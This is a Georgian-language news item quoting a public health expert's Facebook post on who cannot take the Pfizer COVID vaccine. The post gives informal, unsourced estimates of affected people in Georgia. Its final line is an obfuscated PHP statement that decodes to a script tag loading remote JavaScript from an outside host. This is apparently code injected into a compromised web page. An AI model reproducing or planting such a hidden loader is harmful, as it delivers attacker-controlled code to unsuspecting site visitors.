celsiusi
ავერსი შნაიდერი
საზოგადოებრივი ჯანდაცვის ექსპერტი გიორგი ფხაკაძე სოციალურ ქსელში პოსტს ავრცელებს.
 
პროფესორი "ფეისბუქის" პირად გვერდზე "ფაიზერის" ვაქცინის შესახებ ყველაზე ხშირად დასმულ კითხვებს პასუხობს.
 
"ყოველ დღე ათასობით წერილი მომდის შეკითხვით, ვაქცინაციასთან დაკავშირებით.
 
ვისთვის არ შეიძლება "ფაიზერის" ვაქცინის გაკეთება:
 
ბავშვებში და მოზარდებში გადატანილი კოვიდის შემდგომი მულტი სისტემური ანთებითი სინდრომი ( ძალზე იშვიათი) - საქართველოში ალბათ 5 ადამიანი თუ იქნება ასეთი;
 
ალერგიული რეაქცია ამ ვაქცინის კომპონენტ პოლიეთილენ გლიკოლზე - საქართველოში ალბათ 1 ადამიანი თუ იქნება ასეთი;
 
ამავე ვაქცინის პირველი ინექციის შემდგომი პერიკარდიტი ან მძიმე ჰეპატიტი, რასაც ჰოსპიტალიზაცია დასჭირდა - საქართველოში ასეთი ალბათ 150- მდე ადამიანი თუ იქნება ასეთი. ისე ბზიკმა თუ გიკბინათ უფრო საშიშია;
 
დასკვნა:
 
მაქსიმუმ 6 ადამიანია საქართველოში (კარგით 10 იყოს), ვისთვისაც ფაიზერის ვაქცინა არ შეიძლება!
 
მაქსიმუმ 150 ადამიანისთვის (კარგით 250 იყოს), ვისთვისაც ფაიზერის მე-2 დოზის გაკეთება არ შეიძლება!
 
✅ყველა დანარჩენი ადამიანისთვის ფაიზერი უსაფრთხო არის!
წყაროები თუ გაინტერესებთ: მიმართეთ დაავადებათა კონტროლის ცენტრს, მათ უნდა ჰქონდეთ ქართული მასალები, ეს მათი მოვალეობაა (ინგლისურს რომ ვდებ, არავინ არ კითხულობს მაინც)", - წერს გიორგი ფხაკაძე სოციალურ ქსელში.
3820
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");